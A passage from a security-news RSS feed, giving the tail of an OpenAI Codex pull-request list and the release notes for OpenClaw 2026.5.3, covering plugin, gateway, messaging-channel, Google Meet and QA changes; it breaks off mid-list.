<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354518677" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20291" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20291/hovercard" href="https://github.com/openai/codex/pull/20291">#20291</a> app-server: remove dead api version handling from bespoke events <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354866485" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20304" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20304/hovercard" href="https://github.com/openai/codex/pull/20304">#20304</a> [plugins] Allow MSFT curated plugins in tool_suggest <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzeng-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzeng-openai">@mzeng-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346792843" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20095" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20095/hovercard" href="https://github.com/openai/codex/pull/20095">#20095</a> permissions: expose active profile metadata <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337793807" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19840" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19840/hovercard" href="https://github.com/openai/codex/pull/19840">#19840</a> Add persisted hook enablement state <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinav-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinav-oai">@abhinav-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355806929" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20343" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20343/hovercard" href="https://github.com/openai/codex/pull/20343">#20343</a> ci: increase Windows release workflow timeouts <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.5.3]]></title>
<description><![CDATA[Highlights

Plugins/file-transfer: add bundled file-transfer plugin with file_fetch, dir_list, dir_fetch, and file_write agent tools for binary file ops on paired nodes; default-deny per-node path policy under plugins.entries.file-transfer.config.nodes with operator approval, symlink traversal re...]]></description>
<link>https://tsecurity.de/de/3485244/downloads/openclaw-202653/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3485244/downloads/openclaw-202653/</guid>
<pubDate>Mon, 04 May 2026 09:15:58 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>Plugins/file-transfer: add bundled file-transfer plugin with <code>file_fetch</code>, <code>dir_list</code>, <code>dir_fetch</code>, and <code>file_write</code> agent tools for binary file ops on paired nodes; default-deny per-node path policy under <code>plugins.entries.file-transfer.config.nodes</code> with operator approval, symlink traversal refused by default (opt-in <code>followSymlinks</code>), and a 16 MB byte ceiling per round-trip. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354792250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74742" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74742/hovercard" href="https://github.com/openclaw/openclaw/pull/74742">#74742</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Plugins/install: harden official plugin install, uninstall, update, onboarding, ClawHub fallback, npm dependency-state reporting, and beta-channel update paths so externalized plugins behave like first-class package installs.</li>
<li>Gateway/performance: trim startup and Control UI hot paths by lazy-loading plugin/runtime discovery, cron, schema, shutdown, sessions, and model metadata work only when needed.</li>
<li>Channels/replies: improve Discord status reactions and degraded transport reporting, add WhatsApp Channel/Newsletter targets, and tighten Telegram, Feishu, Matrix, Microsoft Teams, and Slack delivery/recovery behavior.</li>
<li>Install/update: recover broken macOS LaunchAgent upgrades, reject source-only plugin packages before runtime load, and repair stale Gateway/plugin state during updates and doctor runs.</li>
<li>Agent/runtime reliability: preserve streamed provider replies, delayed A2A session replies, prompt/tool delivery, memory recall, web search provider discovery, and provider-specific thinking/model metadata across common edge cases.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Channels/streaming: add unified <code>streaming.mode: "progress"</code> drafts with auto single-word status labels and shared progress configuration across Discord, Telegram, Matrix, Slack, and Microsoft Teams.</li>
<li>Agents/commands: add <code>/steer &lt;message&gt;</code> for queue-independent steering of the active current-session run without starting a new turn when the session is idle. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372960326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76934" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76934/hovercard" href="https://github.com/openclaw/openclaw/pull/76934">#76934</a>)</li>
<li>Tools/BTW: add <code>/side</code> as a text and native slash-command alias for <code>/btw</code> side questions.</li>
<li>Doctor/config: <code>doctor --fix</code> now commits safe legacy migrations even when unrelated validation issues (e.g. a missing plugin) prevent full validation from passing, so <code>agents.defaults.llm</code> and other known-legacy keys are always cleaned up by <code>doctor --fix</code> regardless of other config problems. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372284670" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76798/hovercard" href="https://github.com/openclaw/openclaw/issues/76798">#76798</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372297549" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76800" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76800/hovercard" href="https://github.com/openclaw/openclaw/pull/76800">#76800</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Agents/tools: skip optional media and PDF tool factories when the effective tool denylist already blocks them, avoiding unnecessary hot-path setup for tools that will be filtered out before model use. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372183833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76773/hovercard" href="https://github.com/openclaw/openclaw/pull/76773">#76773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorukardahan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorukardahan">@dorukardahan</a>.</li>
<li>Discord/status: let explicit reaction tool calls opt into tracking subsequent tool progress on the reacted message with <code>trackToolCalls: true</code>, and use the shared tool display emoji table for status reactions.</li>
<li>Gateway/config: stop Gateway startup and hot reload from auto-restoring invalid config; invalid config now fails closed and <code>openclaw doctor --fix</code> owns last-known-good repair.</li>
<li>Gateway/performance: lazy-load early runtime discovery and shutdown-hook helpers, defer maintenance timers until after readiness, and trim duplicate plugin auto-enable work during Gateway startup.</li>
<li>QA/Mantis: add a <code>pnpm openclaw qa mantis discord-smoke</code> runner and manual GitHub workflow that verify the Mantis Discord bot can see the configured guild/channel, post a smoke message, add a reaction, and upload artifacts.</li>
<li>QA/Slack: add a Slack live transport QA runner with canary and mention-gating coverage for the private bot-to-bot harness. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: let Manual setup install optional official plugins, including ClawHub-backed diagnostics with npm fallback, and expose the external Codex plugin as a selectable provider setup choice. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI/update: include package dependency install state in <code>openclaw plugins list --json</code>, trust official externalized npm migrations, clean stale bundled load paths for externalized installs, try plugin <code>@beta</code> updates first on the beta OpenClaw channel, and fall back to default/latest when no plugin beta release exists.</li>
<li>Plugins/ClawHub: annotate 429 errors with reset windows and unauthenticated higher-rate-limit hints, so operators can tell when downloads recover and when signing in helps. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Gateway/performance: lazy-load early runtime discovery, shutdown hooks, cron, channel-config schema metadata, restart sentinels, and maintenance timers after readiness; trim duplicate plugin auto-enable work and add startup CPU/profile controls.</li>
<li>Gateway/config: stop Gateway startup and hot reload from auto-restoring invalid config; invalid config now fails closed and <code>openclaw doctor --fix</code> owns last-known-good repair.</li>
<li>Discord/status: let explicit reaction tool calls opt into tracking later tool progress with <code>trackToolCalls: true</code>, share tool display emoji mapping, and surface degraded Discord transport or gateway event-loop starvation in status output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370424830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76327/hovercard" href="https://github.com/openclaw/openclaw/pull/76327">#76327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels/WhatsApp: support explicit WhatsApp Channel/Newsletter <code>@newsletter</code> outbound message targets with channel session metadata instead of DM routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921599881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13417/hovercard" href="https://github.com/openclaw/openclaw/issues/13417">#13417</a>; carries forward the narrow outbound target idea from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921655588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/13424/hovercard" href="https://github.com/openclaw/openclaw/pull/13424">#13424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agentz-manfred/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agentz-manfred">@agentz-manfred</a>.</li>
<li>Agents/tools: skip optional media and PDF tool factories when the effective tool denylist already blocks them, avoiding unnecessary hot-path setup for tools that will be filtered out before model use. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372183833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76773/hovercard" href="https://github.com/openclaw/openclaw/pull/76773">#76773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorukardahan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorukardahan">@dorukardahan</a>.</li>
<li>Agents/sandbox: store sandbox container and browser registry entries as per-runtime shard files, reducing unrelated session lock contention while <code>openclaw doctor --fix</code> migrates legacy monolithic registry files. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355267442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74831" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74831/hovercard" href="https://github.com/openclaw/openclaw/pull/74831">#74831</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luckylhb90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luckylhb90">@luckylhb90</a>.</li>
<li>Tools/BTW: add <code>/side</code> as a text and native slash-command alias for <code>/btw</code> side questions.</li>
<li>Exec approvals: add a tree-sitter-backed shell command explainer for future approval and command-review surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356957695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75004/hovercard" href="https://github.com/openclaw/openclaw/pull/75004">#75004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>QA/Mantis: add a <code>pnpm openclaw qa mantis discord-smoke</code> runner and manual GitHub workflow that verify the Mantis Discord bot can see the configured guild/channel, post a smoke message, add a reaction, and upload artifacts.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Channels/WhatsApp: allow <code>@whiskeysockets/libsignal-node</code> in <code>onlyBuiltDependencies</code> so pnpm v9+ <code>blockExoticSubdeps</code> no longer rejects the baileys git-tarball subdep and silences all inbound agent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371187256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76539" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76539/hovercard" href="https://github.com/openclaw/openclaw/issues/76539">#76539</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/systemd: preserve operator-added secrets in the Gateway env file across re-stage while clearing OpenClaw-managed keys (such as <code>OPENCLAW_GATEWAY_TOKEN</code>) so a fresh staging value is never shadowed by a stale env-file copy; operator secrets are also retained when the state-dir <code>.env</code> is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372544865" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76860/hovercard" href="https://github.com/openclaw/openclaw/issues/76860">#76860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugin updates: do not short-circuit trusted official npm updates as unchanged when the default/latest spec still resolves to an already-installed prerelease that the installer should replace with a stable fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugin tools: keep auth-unavailable optional tools hidden even when another default tool from the same plugin is available and <code>tools.alsoAllow</code> names the optional tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Realtime transcription: report socket closes before provider readiness as closed-before-ready failures instead of mislabeling them as connection timeouts for OpenAI, xAI, and Deepgram streaming transcription. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>OpenAI/Google Meet: fail realtime voice connection attempts when the socket closes before <code>session.updated</code>, avoiding stuck Meet joins waiting on a bridge that never became ready. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/cache: require the full <code>CACHE-OK &lt;suffix&gt;</code> marker before live cache probes stop retrying, so suffix-only prose cannot hide a broken probe response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/Matrix: avoid creating blank progress-draft messages when <code>streaming.progress.label=false</code> and progress tool lines are disabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/Matrix: keep the mock OpenAI tool-progress provider aligned with exact-marker Matrix prompts so the hardened live preview scenario still forces a deterministic read before final delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>OpenAI/Google Meet: wait for realtime voice <code>session.updated</code> before treating the bridge as connected, so Meet joins do not return with audio queued behind an unconfigured realtime session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/catalog: merge official external catalog descriptors into partial package channel config metadata, so lagging WeCom/Yuanbao manifests keep their own schema while still exposing host-supplied labels and setup text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/catalog: supplement lagging official external WeCom and Yuanbao npm manifests with channel config descriptors and declared tool contracts from the OpenClaw catalog, so trusted package sweeps no longer fail because external package metadata trails the host contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: let trusted official <code>@openclaw/*</code> catalog installs recover when npm <code>latest</code> points at a prerelease by falling back to the newest stable version, or by selecting the newest exact prerelease for prerelease-only launch packages with a warning instead of making beta/development plugin sweeps fail at install time. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet: grant Chrome media permissions against the actual Meet tab, start the local realtime audio bridge only after Meet joins, expose realtime transcripts in status/logs, and force explicit audio responses with current OpenAI realtime output-audio events so BlackHole capture does not keep the OpenClaw participant muted or silent.</p>
</li>
<li>
<p>Memory/LanceDB: declare <code>apache-arrow</code> in the bundled memory plugin package so LanceDB installs include its runtime peer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372798421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76910" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76910/hovercard" href="https://github.com/openclaw/openclaw/issues/76910">#76910</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afiqfiles-max/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afiqfiles-max">@afiqfiles-max</a>.</p>
</li>
<li>
<p>CLI/devices: retry explicit device-pair approval with <code>operator.admin</code> after a pairing-scope ownership denial, so existing admin-capable paired-device tokens can recover new Control UI/browser pairing after upgrades instead of requiring manual JSON edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373068828" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76956/hovercard" href="https://github.com/openclaw/openclaw/issues/76956">#76956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neo19482/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neo19482">@neo19482</a>.</p>
</li>
<li>
<p>Google Meet: use the local call-control microphone button instead of disabled remote participant mute buttons, and block realtime speech when the OpenClaw Meet microphone remains muted.</p>
</li>
<li>
<p>Google Meet: refresh realtime browser state during status and retry delayed speech after Meet finishes joining, so a just-opened in-call tab no longer leaves speech stuck behind stale <code>not-in-call</code> health.</p>
</li>
<li>
<p>Plugins/install: recover the install ledger from the managed npm root when <code>plugins/installs.json</code> is empty or partial, so reinstalling Discord and Codex no longer makes the other installed plugin disappear.</p>
</li>
<li>
<p>Google Meet: grant Meet media permissions through the Playwright browser context when CDP grants do not affect the attached Chrome page, and report in-call microphone/speaker permission problems instead of marking realtime speech ready.</p>
</li>
<li>
<p>QA/Slack: fail the live mention-gating scenario on any unexpected SUT reply, even when the reply does not echo the expected marker. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/Matrix: steer the live tool-progress preview check away from <code>HEARTBEAT.md</code> and report final preview candidates when the live marker reply misses the exact token. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>QA/Matrix: let the live tool-progress preview check verify progress replacement events without depending on the preview saying <code>Working</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Tlon: expose <code>groupInviteAllowlist</code> in the channel config schema and clarify that group invite auto-accept fails closed without an invite allowlist. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI/WebChat: collapse duplicate in-flight internal text sends onto the active Gateway run so rapid repeat submits do not start fresh <code>agent:main:main</code> dispatches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365412486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75737" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75737/hovercard" href="https://github.com/openclaw/openclaw/issues/75737">#75737</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dsdsddd1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dsdsddd1">@dsdsddd1</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Mattermost: accept the documented <code>channels.mattermost.streaming</code> config and honor <code>streaming: "off"</code> by disabling draft preview posts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost: expose streaming progress config labels and help text in generated channel config metadata so Control UI/docs can explain the new <code>channels.mattermost.streaming.progress.*</code> fields. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost: honor <code>channels.mattermost.streaming.progress.toolProgress=false</code> in progress draft mode so compact tool status lines stay hidden until final delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Microsoft Teams: honor progress draft tool lines in native Teams progress streams and suppress standalone tool messages when <code>channels.msteams.streaming.progress.toolProgress=false</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep progress draft boundary callbacks bound during streaming replies, so extension lint stays green while progress previews transition between assistant and reasoning blocks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: resolve SecretRef-backed bot tokens from the active runtime snapshot for named accounts and keep unresolved configured tokens from crashing status or health checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373196456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76987" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76987/hovercard" href="https://github.com/openclaw/openclaw/pull/76987">#76987</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Channels/streaming: expose <code>streaming.progress.label</code>, <code>labels</code>, <code>maxLines</code>, and <code>toolProgress</code> in bundled channel config metadata so progress draft settings appear in config, docs, and control surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/streaming: normalize whitespace and case for <code>streaming.progress.label: "auto"</code> so progress draft labels keep using the built-in label pool instead of rendering a literal <code>auto</code> title. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Codex: preserve Codex-native OAuth routing for <code>/codex bind</code> app-server turns so bound sessions keep the selected Codex auth profile instead of falling back to public OpenAI credentials. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371977999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76714/hovercard" href="https://github.com/openclaw/openclaw/pull/76714">#76714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</p>
</li>
<li>
<p>Gateway/install: prefer supported system Node over nvm/fnm/volta/asdf/mise when regenerating managed gateway services, so <code>gateway install --force</code> no longer recreates service definitions that doctor immediately flags as version-manager-backed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370479446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76339/hovercard" href="https://github.com/openclaw/openclaw/issues/76339">#76339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</p>
</li>
<li>
